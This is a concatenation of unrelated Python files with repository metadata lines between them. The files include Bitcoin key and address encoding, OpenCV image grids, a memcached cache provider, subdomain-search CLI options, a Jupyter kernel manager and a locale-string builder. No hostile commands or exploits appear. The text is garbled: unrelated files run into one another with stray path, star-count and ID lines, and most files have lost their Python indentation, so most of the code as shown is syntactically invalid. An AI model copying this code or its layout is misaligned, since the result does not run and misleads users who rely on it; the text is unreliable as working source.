#!/usr/bin/python
# Copyright (c) 2016, <NAME> <<EMAIL>>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of ecpy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from ecpy.point import Point, Generator
import ecpy.curves as curves
from Crypto.Random import random
from Crypto.Hash import RIPEMD
from hashlib import sha256
import hashlib
from binascii import hexlify, unhexlify
from base58 import b58encode, b58decode
# set up elliptic curve environment
c = curves.curve_secp256k1
Point.set_curve(c)
G = Generator(c['G'][0], c['G'][1])
#mainnet
pub_prefix = '00'
prv_prefix = '80'
#testnet
pub_prefix = '6f'
prv_prefix = 'ef'
#simtest
pub_prefix = '3f'
prv_prefix = '64'
#ctindigonet
pub_prefix = '1c'
prv_prefix = 'bb'
#ctrednet
pub_prefix = '50'
prv_prefix = 'a3'
pub_prefix = '1c'
prv_prefix = 'bb'
def priv_key_fmt(prefix, keyhx):
# generate WIF format
# see: https://en.bitcoin.it/wiki/Wallet_import_format
# add header prefix
h_key = prefix + keyhx
# calc checksum
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_key + cksum))
def priv_key_fmt_C(prefix, keyhx):
# generate WIF format
# see: https://en.bitcoin.it/wiki/Wallet_import_format
# add header prefix
h_key = prefix + keyhx + '01'
# calc checksum
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_key + cksum))
def priv_key_decode(keyb58):
raw = hexlify(b58decode(keyb58))
h_key = raw[:66]
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
if cksum != raw[66:].decode('utf-8'):
raise ValueError('checksum mismatch')
return h_key[2:].decode('utf-8')
def priv_key_decode_C(keyb58):
raw = hexlify(b58decode(keyb58))
h_key = raw[:68]
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
if raw[66:68].decode('utf-8') != '01':
raise ValueError('format error')
if cksum != raw[68:].decode('utf-8'):
raise ValueError('checksum mismatch')
return h_key[2:66].decode('utf-8')
def pub_key_fmt(prefix, keyhx):
# generate V1 Address format
# see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses
# hash key - sha256 then ripemd160
h = RIPEMD.new(sha256(unhexlify(keyhx)).digest())
# add header prefix
h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')
# calc checksum
cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_hashkey + cksum))
def pub_key_fmt_C(prefix, keyhx):
# generate V1 Address format
# see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses
# hash key - sha256 then ripemd160
keyval = keyhx
keybin = int(keyhx,16)
if keyhx[:2] == '04':
keyval = ('03' if (keybin % 2) else '02') + keyhx[2:66]
elif (keyhx[:2] != '02') and (keyhx[:2] != '03'):
raise ValueError('input is not ECC point format')
print('keyval = ' + keyval)
h = RIPEMD.new(sha256(unhexlify(keyval)).digest())
# add header prefix
h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')
# calc checksum
cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_hashkey + cksum))
if __name__ == '__main__':
# private key is a random number between 1 and n
# (where n is "order" of curve generator point G)
p = random.randint(1,c['n']-1)
# p = 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D
# p = 0x1111111111111111111111111111111111111111111111111111111111111111;
phx = '%064x' % p
print("PRIVATE KEY MATH : ")
print('rand privkey = ' + phx)
wif_priv = priv_key_fmt(prv_prefix, phx)
print("WIF privkey = " + wif_priv)
if p == 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D:
assert wif_priv == '<KEY>'
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_priv == '<KEY>'
#check that we can recover p from WIF
rhx = priv_key_decode(wif_priv)
# print('rxh, phx =', rhx, phx)
assert rhx == phx
wif_priv_C = priv_key_fmt_C(prv_prefix, phx)
print("WIF privkey Compressed = " + wif_priv_C)
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_priv_C == '<KEY>'
#check that we can recover p from WIF
rhx = priv_key_decode_C(wif_priv_C)
# print('rxh, phx =', rhx, phx)
assert rhx == phx
print("PUBLIC KEY MATH : ")
# p = 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725
P = G * p
Pa = P.affine()
pbhx = '04' + ('%064x' % Pa[0]) + ('%064x' % Pa[1])
print("point long fmt = " + pbhx)
wif_pub = pub_key_fmt(pub_prefix, pbhx)
print("WIF pubkey = " + wif_pub)
if p == 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725:
assert wif_pub == '<KEY>'
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_pub == '<KEY>'
wif_pub_C = pub_key_fmt_C(pub_prefix, pbhx)
print("WIF pubkey Compressed = " + wif_pub_C)
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_pub_C == '<KEY>'
if False:
for i in range(0,255):
ihx = '%02x' % i
print(ihx + ' :priv: ' + priv_key_fmt(ihx, phx) + ' ' + priv_key_fmt_C(ihx, phx))
for i in range(0,255):
ihx = '%02x' % i
print(ihx + ' :pub: ' + pub_key_fmt(ihx, pbhx))
if False:
refprv = '<KEY>'
refder = '<KEY>'
refderp = '<KEY>'
refhx = hexlify(b58decode(refprv)).decode('utf8')
rdehx = hexlify(b58decode(refder)).decode('utf8')
rdphx = hexlify(b58decode(refderp)).decode('utf8')
print('rhx ' + refhx)
print('rdvx ' + rdehx)
print('rdpx ' + rdphx)
refprv = '<KEY>'
refder = '<KEY>'
refderp = '<KEY>'
refhx = hexlify(b58decode(refprv)).decode('utf8')
rdehx = hexlify(b58decode(refder)).decode('utf8')
rdphx = hexlify(b58decode(refderp)).decode('utf8')
print('crhx ' + refhx)
print('crdvx ' + rdehx)
print('crdpx ' + rdphx)
refprv = '<KEY>'
refder = '<KEY>'
refderp = '<KEY>'
refhx = hexlify(b58decode(refprv)).decode('utf8')
rdehx = hexlify(b58decode(refder)).decode('utf8')
rdphx = hexlify(b58decode(refderp)).decode('utf8')
print('zrhx ' + refhx)
print('zrdvx ' + rdehx)
print('zrdpx ' + rdphx)
import numpy as np
import cv2
def _pad_width_center(w, target_w):
left = (target_w - w) // 2
right = target_w - w - left
return left, right
def _pad_width_right(w, target_w):
return 0, target_w - w
def _pad_height_center(h, target_h):
top = (target_h - h) // 2
bottom = target_h - h - top
return top, bottom
def _pad_height_bottom(h, target_h):
return 0, target_h - h
def VStack(*imgs, align='center'):
max_w = max([_.shape[1] for _ in imgs])
imgs_padded = []
if align == 'center':
for img in imgs:
left, right = _pad_width_center(img.shape[1], max_w)
imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))
elif align == 'left':
for img in imgs:
left, right = _pad_width_right(img.shape[1], max_w)
imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))
else:
raise ValueError('Unsupported alignment %s' % align)
return np.concatenate(imgs_padded, axis=0)
def HStack(*imgs, align='center'):
max_h = max([_.shape[0] for _ in imgs])
imgs_padded = []
if align == 'center':
for img in imgs:
top, bottom = _pad_height_center(img.shape[0], max_h)
imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))
elif align == 'top':
for img in imgs:
top, bottom = _pad_height_bottom(img.shape[0], max_h)
imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))
else:
raise ValueError('Unsupported alignment %s' % align)
return np.concatenate(imgs_padded, axis=1)
def Grid(*imgs, n_col=1, align='center'):
chunks = [imgs[i:i + n_col] for i in range(0, len(imgs), n_col)]
row_imgs = [HStack(*_, align=align) for _ in chunks]
return VStack(*row_imgs, align=align)
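# --- Illustrative sketch (added; the image sizes below are made up) ---
# VStack/HStack pad each image to a common width/height with black borders before
# concatenating, and Grid arranges the inputs into rows of n_col images.
if __name__ == '__main__':
    a = np.zeros((40, 60, 3), np.uint8)
    b = np.zeros((30, 80, 3), np.uint8)
    c = np.zeros((50, 50, 3), np.uint8)
    print(VStack(a, b).shape)               # (70, 80, 3)
    print(HStack(a, b, align='top').shape)  # (40, 140, 3)
    print(Grid(a, b, c, n_col=2).shape)     # (90, 140, 3)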
1,917
render/scene/SceneGnomon.py
bvraghav/standible
1
2024374
import logging as lg
from utils import Get, Set
from . SceneDefault import SceneDefault
from . Taxonomy import Taxonomy
from . CameraGnomon import CameraGnomon
from . Light import Light
from . Gnomon import Gnomon
from . Render import Render
class SceneGnomon(SceneDefault) :
def setup(self) :
lg.debug(
'Setting up scene from data: %s',
Get.config('runtime/scene')
)
self.clear_scene()
Taxonomy().setup()
CameraGnomon.setup()
Light.setup()
Gnomon.setup()
Render.setup()
523
src/sagemaker_algorithm_toolkit/metrics.py
Chick-star/sagemaker-xgboost-container
1
2024423
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is
# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from sagemaker_algorithm_toolkit import exceptions as exc
import logging
class Metric(object):
MAXIMIZE = "Maximize"
MINIMIZE = "Minimize"
def __init__(self, name, regex, format_string=None, tunable=True, direction=None):
self.name = name
self.format_string = format_string
self.direction = direction
self.regex = regex
self.tunable = tunable
if self.tunable and direction is None:
raise exc.AlgorithmError("direction must be specified if tunable is True.")
def log(self, value):
logging.info(self.format_string.format(value))
def format_tunable(self):
return {"MetricName": self.name,
"Type": self.direction}
def format_definition(self):
return {"Name": self.name,
"Regex": self.regex}
class Metrics(object):
def __init__(self, *metrics):
self.metrics = {metric.name: metric for metric in metrics}
def __getitem__(self, name):
return self.metrics[name]
@property
def names(self):
return list(self.metrics)
def format_tunable(self):
metrics = []
for name, metric in self.metrics.items():
if metric.tunable:
metrics.append(metric.format_tunable())
return metrics
def format_definitions(self):
return [metric.format_definition() for name, metric in self.metrics.items()]
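# --- Illustrative sketch (added; the metric name and regex are hypothetical) ---
# A Metric bundles a name, a log-parsing regex and a tuning direction; Metrics
# then formats them as metric definitions and tuning objectives.
if __name__ == '__main__':
    demo = Metrics(Metric(name="validation:rmse",
                          regex=r"validation-rmse:(\S+)",
                          format_string="validation-rmse:{}",
                          direction=Metric.MINIMIZE))
    print(demo.format_definitions())  # [{'Name': 'validation:rmse', 'Regex': 'validation-rmse:(\\S+)'}]
    print(demo.format_tunable())      # [{'MetricName': 'validation:rmse', 'Type': 'Minimize'}]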
import bmemcached
import os
from pysimplecache.providers.base_provider import BaseProvider, \
UnhandledCachingException
class MemcachedProvider(BaseProvider):
""" Memcached Provider """
def __init__(self, conversion, username=None, password=None,
servers=None, enabled=True):
""" Memcached Provider
:param conversion: class for data conversion
:param username: str memcached username
:param password: str memcached password
:param servers: str memcached servers (comma separated)
:param enabled: bool if caching is enabled
"""
self.conversion = conversion
self.cache_enabled = bool(os.getenv('MEMCACHEDCLOUD_ENABLED', enabled))
self.cache_server = os.getenv('MEMCACHEDCLOUD_SERVERS', servers)
self.cache_user = os.getenv('MEMCACHEDCLOUD_USERNAME', username)
self.cache_pass = os.getenv('MEMCACHEDCLOUD_PASSWORD', password)
self._client = self._setup_client()
def _setup_client(self):
""" Setup memcached client
:return: obj memcached client
"""
if self.cache_enabled:
try:
if self.cache_user and self.cache_pass:
return bmemcached.Client(
self.cache_server.split(','),
self.cache_user,
self.cache_pass)
else:
return bmemcached.Client(
self.cache_server.split(','))
except Exception as e:
raise UnhandledCachingException(
                    'UnhandledCachingException: {}'.format(str(e)))
return None
def get(self, key, ttl, method, **kwargs):
""" Get cached data or call passed method
:param key: str key value for cached data
:param ttl: int ttl value for cached data
:param method: obj method call for cache miss
:param kwargs: parameters to pass into method
:return: data, bool cache miss
:raises: UnhandledCachingException
"""
if self._client:
try:
data = self._client.get(key)
# if cache hit then return data decoded and if no
# data present in cache, call method with passed
# arguments and store in cache
if data:
return self.conversion.decode(data), False
else:
# if method is passed, load data and pass into
# memcached with key
if method is not None:
data = method(**kwargs)
self.put(key, ttl, data)
return data, True
else:
return None, True
except Exception as e:
raise UnhandledCachingException(
                    'UnhandledCachingException: {}'.format(str(e)))
finally:
self._client.disconnect_all()
def put(self, key, ttl, data):
""" Put data into cache with passed ttl from referenced method
:param key: str key value for cached data
:param ttl: int ttl value for cached data
:param data: data to pass into cache
:return: None
:raises: UnhandledCachingException
"""
if self._client:
try:
self._client.set(key, self.conversion.encode(data), ttl)
except Exception as e:
raise UnhandledCachingException(
                    'UnhandledCachingException: {}'.format(str(e)))
finally:
self._client.disconnect_all()
def delete(self, key):
""" Delete cached data with passed key
:param key: str key value for cached data
:return: None
:raises: UnhandledCachingException
"""
if self._client:
try:
self._client.delete(key)
except Exception as e:
raise UnhandledCachingException(
                    'UnhandledCachingException: {}'.format(str(e)))
finally:
self._client.disconnect_all()
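# A minimal cache-aside sketch of the get() flow documented above. The
# JsonConversion class and load_user() below are hypothetical stand-ins, and a
# memcached instance is assumed to be reachable at 127.0.0.1:11211.
if __name__ == '__main__':
    import json
    class JsonConversion(object):
        """Hypothetical conversion object exposing the encode/decode interface."""
        def encode(self, data):
            return json.dumps(data)
        def decode(self, data):
            return json.loads(data)
    def load_user(user_id):
        # Stand-in for an expensive lookup (database call, HTTP request, ...).
        return {"id": user_id, "name": "example"}
    provider = MemcachedProvider(JsonConversion(), servers="127.0.0.1:11211")
    data, missed = provider.get("user:1", ttl=300, method=load_user, user_id=1)
    print(data, missed)  # miss on the first call, hit on subsequent calls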
4,247
subseeker_core/options.py
DFC302/subseeker
19
2022820
# This file contains information regarding command line arguments, title
# information and version information.
import argparse
import sys
from termcolor import colored
# User options
def options():
parser = argparse.ArgumentParser()
# specify domain
parser.add_argument(
"--domain",
help="Specify domain to search.",
action="store",
)
# single search mode
parser.add_argument(
"--singlesearch",
help="Search using a specific certificate site. Use --singlesearch options to list available search options.",
action="store",
type=str,
)
# User can specify keywords instead of a file full of sub keywords
parser.add_argument(
"--keywords",
nargs="+",
help="Add a list of keywords.",
type=str,
)
# Parse subdomain keywords from other tools output files
parser.add_argument(
"--generate",
help="Create a list of sub domain keywords from a file containing \
subdomains.",
action="store_true",
)
# search domain using subdomain keywords from file
parser.add_argument(
"--file",
help="Specify a file containing keywords to parse crt.sh OR to create \
sub keywords from.",
action="store",
)
# Write to output file
parser.add_argument(
"--out",
help="Specify a file to write results too.",
action="store",
)
# User specify number of threads
parser.add_argument(
"--threads",
help="Specify number of threads to be used when performing keyword \
search.",
action="store",
type=int,
)
# Try with different headers, firefox, chrome, opera
parser.add_argument(
"--useragent",
help="Specify a user-agent to use. Default is a firefox UA.",
action="store",
type=str
)
# If API information has been configured, allow use of API credentials
parser.add_argument(
"--api",
help="Turn on api.",
action="store_true",
)
# Specify page number for certdb and/or censys
parser.add_argument(
"--page",
help="Used with certdb and/or censys searchmodes. Specify page number to display.",
action="store",
type=int,
)
parser.add_argument(
"--version",
help="Display version information",
action="store_true",
)
parser.add_argument(
"--verbose",
help="Display extra verbose information, such as errors.",
action="store_true",
)
    # if no arguments are given, print usage message
if len(sys.argv[1:]) == 0:
parser.print_help()
parser.exit()
args = parser.parse_args()
return args
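# A minimal sketch of a hypothetical caller (not defined in this file):
# parse the CLI and branch on a couple of the flags declared above.
if __name__ == '__main__':
    args = options()
    if args.domain:
        print(colored("Searching subdomains of %s" % args.domain, "green"))
    elif args.generate and args.file:
        print(colored("Generating keywords from %s" % args.file, "green"))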
2,391
sdk/identity/azure-identity/tests/test_imds.py
kushan2018/azure-sdk-for-python
0
2024566
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.identity._internal import ImdsCredential
def test_imds_credential():
credential = ImdsCredential()
token = credential.get_token("https://management.azure.com/.default")
assert token
358
String Conversion.py
Darkhunter9/python
0
2023205
def steps_to_convert(line1,line2):
def compare(line1,line2,i):
tempdict = {}
for j in range(len(line1)):
if line1[j] in line2:
try:
tempdict[i+j] = line2.index(line1[j],max(tempdict.values()) if tempdict else 0)
except Exception:
continue
return tempdict
def calculate(line1,line2,similardict):
result = 0
temp3 = -1
temp4 = -1
while similardict:
result += max(min(similardict.keys())-1-temp3,similardict[min(similardict.keys())]-temp4-1)
temp3 = min(similardict.keys())
temp4 = similardict[min(similardict.keys())]
similardict.pop(min(similardict.keys()))
result += max(len(line1)-temp3-1,len(line2)-temp4-1)
return result
result = None
for i in range(len(line1)):
tempdict = {}
tempdict = compare(line1[i:],line2,i)
if result == None:
result = calculate(line1,line2,tempdict)
else:
result = min(result,calculate(line1,line2,tempdict))
for i in range(len(line2)):
tempdict = {}
tempdict = compare(line2[i:],line1,i)
if result == None:
result = calculate(line2,line1,tempdict)
else:
result = min(result,calculate(line2,line1,tempdict))
if result == None:
return 0
else:
return result
if __name__ == "__main__":
#These "asserts" using only for self-checking and not necessary for auto-testing
assert steps_to_convert('line1', 'line1') == 0, "eq"
assert steps_to_convert('line1', 'line2') == 1, "2"
assert steps_to_convert('line', 'line2') == 1, "none to 2"
assert steps_to_convert('ine', 'line2') == 2, "need two more"
assert steps_to_convert('line1', '1enil') == 4, "everything is opposite"
assert steps_to_convert('', '') == 0, "two empty"
assert steps_to_convert('l', '') == 1, "one side"
assert steps_to_convert('', 'l') == 1, "another side"
print("You are good to go!")
2,088
tests/test_io.py
sandralorenz268/hylite
0
2023268
import unittest
import os
from hylite import io
from pathlib import Path
from tempfile import mkdtemp
import shutil
class TestHyImage(unittest.TestCase):
def test_load(self):
self.img = io.load(os.path.join(str(Path(__file__).parent.parent), "test_data/image.hdr"))
self.lib = io.load(os.path.join(str(Path(__file__).parent.parent), "test_data/library.csv"))
self.cld = io.load(os.path.join(str(Path(__file__).parent.parent), "test_data/hypercloud.hdr"))
def test_save(self):
self.test_load() # load datasets
for data in [self.img, self.lib, self.cld]:
pth = mkdtemp()
try:
io.save(os.path.join(pth, "data.hdr"), data )
shutil.rmtree(pth) # delete temp directory
except:
shutil.rmtree(pth) # delete temp directory
self.assertFalse(True, "Error - could not save data of type %s" % str(type(data)))
if __name__ == '__main__':
unittest.main()
995
swap-random.py
jonspeicher/blinkyfun
0
2023835
#!/usr/bin/env python
from blinkytape import tape, player
from patterns import random
from animations import swap
import sys
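# Example invocation (the frame period value below is illustrative):
#   ./swap-random.py 0.05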
tape = tape.BlinkyTape.find_first()
pattern = random.Random(tape.pixel_count)
frame_period_sec = float(sys.argv[1])
animation = swap.Swap(pattern, frame_period_sec)
player = player.Player(tape)
player.play_animation(animation, player.FOREVER)
373
environment_kernels/core.py
Cadair/jupyter_conda_kernels
150
2024180
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import os.path
from jupyter_client.kernelspec import (KernelSpecManager, NoSuchKernel)
from traitlets import List, Unicode, Bool, Int
from .envs_conda import get_conda_env_data
from .envs_virtualenv import get_virtualenv_env_data
from .utils import FileNotFoundError, HAVE_CONDA
ENV_SUPPLYER = [get_conda_env_data, get_virtualenv_env_data]
__all__ = ['EnvironmentKernelSpecManager']
class EnvironmentKernelSpecManager(KernelSpecManager):
"""
    A Jupyter Kernel manager which dynamically checks for Environments
Given a list of base directories, this class searches for the pattern::
    BASE_DIR/NAME/{bin|Scripts}/ipython
where NAME is taken to be the name of the environment.
"""
# Take the default home DIR for conda and virtualenv as the default
_default_conda_dirs = ['~/.conda/envs/']
_default_virtualenv_dirs = ['~/.virtualenvs']
# Check for the CONDA_ENV_PATH variable and add it to the list if set.
if os.environ.get('CONDA_ENV_PATH', False):
_default_conda_dirs.append(os.environ['CONDA_ENV_PATH'].split('envs')[0])
# If we are running inside the root conda env can get all the env dirs:
if HAVE_CONDA:
import conda
_default_conda_dirs += conda.config.envs_dirs
# Remove any duplicates
_default_conda_dirs = list(set(map(os.path.expanduser,
_default_conda_dirs)))
conda_env_dirs = List(
_default_conda_dirs,
config=True,
help="List of directories in which are conda environments.")
virtualenv_env_dirs = List(
_default_virtualenv_dirs,
config=True,
help="List of directories in which are virtualenv environments.")
blacklist_envs = List(
["conda__build"],
config=True,
help="Environments which should not be used even if a ipykernel exists in it.")
whitelist_envs = List(
[],
config=True,
help="Environments which should be used, all others are ignored (overwrites blacklist_envs).")
display_name_template = Unicode(
u"Environment ({})",
config=True,
help="Template for the kernel name in the UI. Needs to include {} for the name.")
conda_prefix_template = Unicode(
u"conda_{}",
config=True,
help="Template for the conda environment kernel name prefix in the UI. Needs to include {} for the name.")
virtualenv_prefix_template = Unicode(
u"virtualenv_{}",
config=True,
help="Template for the virtualenv environment kernel name prefix in the UI. Needs to include {} for the name.")
find_conda_envs = Bool(
True,
config=True,
help="Probe for conda environments, including calling conda itself.")
find_r_envs = Bool(
True,
config=True,
help="Probe environments for R kernels (currently only conda environments).")
use_conda_directly = Bool(
True,
config=True,
help="Probe for conda environments by calling conda itself. Only relevant if find_conda_envs is True.")
refresh_interval = Int(
3,
config=True,
help="Interval (in minutes) to refresh the list of environment kernels. Setting it to '0' disables the refresh.")
find_virtualenv_envs = Bool(True,
config=True,
help="Probe for virtualenv environments.")
def __init__(self, *args, **kwargs):
super(EnvironmentKernelSpecManager, self).__init__(*args, **kwargs)
self.log.info("Using EnvironmentKernelSpecManager...")
self._env_data_cache = {}
if self.refresh_interval > 0:
try:
from tornado.ioloop import PeriodicCallback, IOLoop
# Initial loading NOW
IOLoop.current().call_later(0, callback=self._update_env_data, initial=True)
# Later updates
updater = PeriodicCallback(callback=self._update_env_data,
callback_time=1000 * 60 * self.refresh_interval)
updater.start()
if not updater.is_running():
raise Exception()
self._periodic_updater = updater
self.log.info("Started periodic updates of the kernel list (every %s minutes).", self.refresh_interval)
except:
self.log.exception("Error while trying to enable periodic updates of the kernel list.")
else:
self.log.info("Periodical updates the kernel list are DISABLED.")
def validate_env(self, envname):
"""
        Check the name of the environment against the blacklist and the
        whitelist. If a whitelist is specified, only the whitelist is checked.
"""
if self.whitelist_envs and envname in self.whitelist_envs:
return True
elif self.whitelist_envs:
return False
if self.blacklist_envs and envname not in self.blacklist_envs:
return True
elif self.blacklist_envs:
# If there is just a True, all envs are blacklisted
return False
else:
return True
def _update_env_data(self, initial=False):
if initial:
self.log.info("Starting initial scan of virtual environments...")
else:
self.log.debug("Starting periodic scan of virtual environments...")
self._get_env_data(reload=True)
self.log.debug("done.")
def _get_env_data(self, reload=False):
"""Get the data about the available environments.
env_data is a structure {name -> (resourcedir, kernel spec)}
"""
        # This is called much too often and the environment-discovery process is really expensive :-(
if not reload and getattr(self, "_env_data_cache", {}):
return getattr(self, "_env_data_cache")
env_data = {}
for supplyer in ENV_SUPPLYER:
env_data.update(supplyer(self))
env_data = {name: env_data[name] for name in env_data if self.validate_env(name)}
new_kernels = [env for env in list(env_data.keys()) if env not in list(self._env_data_cache.keys())]
if new_kernels:
self.log.info("Found new kernels in environments: %s", ", ".join(new_kernels))
self._env_data_cache = env_data
return env_data
def find_kernel_specs_for_envs(self):
"""Returns a dict mapping kernel names to resource directories."""
data = self._get_env_data()
return {name: data[name][0] for name in data}
def get_all_kernel_specs_for_envs(self):
"""Returns the dict of name -> kernel_spec for all environments"""
data = self._get_env_data()
return {name: data[name][1] for name in data}
def find_kernel_specs(self):
"""Returns a dict mapping kernel names to resource directories."""
# let real installed kernels overwrite envs with the same name:
# this is the same order as the get_kernel_spec way, which also prefers
# kernels from the jupyter dir over env kernels.
specs = self.find_kernel_specs_for_envs()
specs.update(super(EnvironmentKernelSpecManager,
self).find_kernel_specs())
return specs
def get_all_specs(self):
"""Returns a dict mapping kernel names and resource directories.
"""
# This is new in 4.1 -> https://github.com/jupyter/jupyter_client/pull/93
specs = self.get_all_kernel_specs_for_envs()
specs.update(super(EnvironmentKernelSpecManager, self).get_all_specs())
return specs
def get_kernel_spec(self, kernel_name):
"""Returns a :class:`KernelSpec` instance for the given kernel_name.
Raises :exc:`NoSuchKernel` if the given kernel name is not found.
"""
try:
return super(EnvironmentKernelSpecManager,
self).get_kernel_spec(kernel_name)
except (NoSuchKernel, FileNotFoundError):
venv_kernel_name = kernel_name.lower()
specs = self.get_all_kernel_specs_for_envs()
if venv_kernel_name in specs:
return specs[venv_kernel_name]
else:
raise NoSuchKernel(kernel_name)
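# A sketch of enabling this manager from a Jupyter config file
# (e.g. jupyter_notebook_config.py); the env directory below is illustrative.
#
#   c.NotebookApp.kernel_spec_manager_class = \
#       'environment_kernels.EnvironmentKernelSpecManager'
#   c.EnvironmentKernelSpecManager.conda_env_dirs = ['~/miniconda3/envs']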
# Copyright (c) 2017, <NAME> University. All rights reserved.
#
# Use of the K-NRM package is subject to the terms of the software license set
# forth in the LICENSE file included with this software, and also available at
# https://github.com/AdeDZY/K-NRM/blob/master/LICENSE
from os import path
ROOTPATH = path.dirname(path.dirname(path.dirname(path.abspath(__file__))))
query_field = 'query'
title_field = 'title'
body_field = 'body'
438
python/hardway/ex17_1.py
petervdb/eLearning
0
2024442
from sys import argv
from os.path import exists
# short version of ex17_0.py
# The script requires 2 arguments: the original filename and the new filename.
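# Example invocation (filenames are illustrative):
#   $ python ex17_1.py notes.txt notes_copy.txt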
script, from_file, to_file = argv
print "Copying from %s to %s" % (from_file, to_file)
indata = open(from_file).read()
out_file = open(to_file, 'w')
out_file.write(indata)
out_file.close()
349
LocaleStringBuilder.py
FlasHAdi/LocaleString-LocaleQuest-Builder
0
2024497
__author__ = "Owsap"
__copyright__ = "Copyright 2020, Owsap Productions"
__license__ = "MIT"
__version__ = "1.0.0"
import os
import sys
import logging
LOG_FILE_NAME = "LocaleStringBuilder.log" # Log file
LOCALE_STRING_FILE = "locale_string.txt" # Locale string file name
LOCALE_STRING_BASE_FILE = "share/locale_string_vnum.txt" # Reference file name (String VNUM)
if not os.path.exists("log"):
os.mkdir("log")
logging.basicConfig(filename = "log/" + LOG_FILE_NAME, level = logging.DEBUG, format = '%(asctime)s %(message)s', datefmt = '%d/%m/%Y %H:%M:%S')
def GetLocaleStringFile(locale):
return "locale/%s/%s" % (locale, LOCALE_STRING_FILE)
def TransalteLocaleString(locale):
if not os.path.exists(LOCALE_STRING_BASE_FILE):
print "Reference file not found. %s" % LOCALE_STRING_BASE_FILE
logging.warning("Reference file not found. %s" % LOCALE_STRING_BASE_FILE)
return
localeStringOutput = "locale_string_%s.txt" % locale
if os.path.exists(localeStringOutput):
os.remove(localeStringOutput)
fileOutput = open(localeStringOutput, 'a')
for line in open(LOCALE_STRING_BASE_FILE, 'r'):
split = line.split('";')
vnum = split[0][1:]
if not vnum:
print ""
fileOutput.write("")
if not vnum.isdigit():
formated = split[0] + "\";"
print (formated.rsplit("\n", 1)[0])
fileOutput.write(formated.rsplit("\n")[0] + "\n")
continue
print GetTranslationVnum(locale, vnum)
fileOutput.write(GetTranslationVnum(locale, vnum) + "\n")
fileOutput.close()
def GetTranslationVnum(locale, vnum):
lineCount = 0
for line in open(GetLocaleStringFile(locale), 'r'):
lineCount += 1
match = line.find(vnum)
if match == 0:
localeStringFile = open(GetLocaleStringFile(locale), 'r')
localeText = str(localeStringFile.readlines()[lineCount - 1])
split = localeText.split("\t")
formated = "\"" + split[1]
return (formated.rsplit("\n", 1)[0]) + "\";"
if __name__ == "__main__":
if len(sys.argv) < 2:
print "USAGE: [locale]"
locale = raw_input("Enter locale name: ")
TransalteLocaleString(str(locale))
elif len(sys.argv) == 2:
TransalteLocaleString(sys.argv[1])
2,189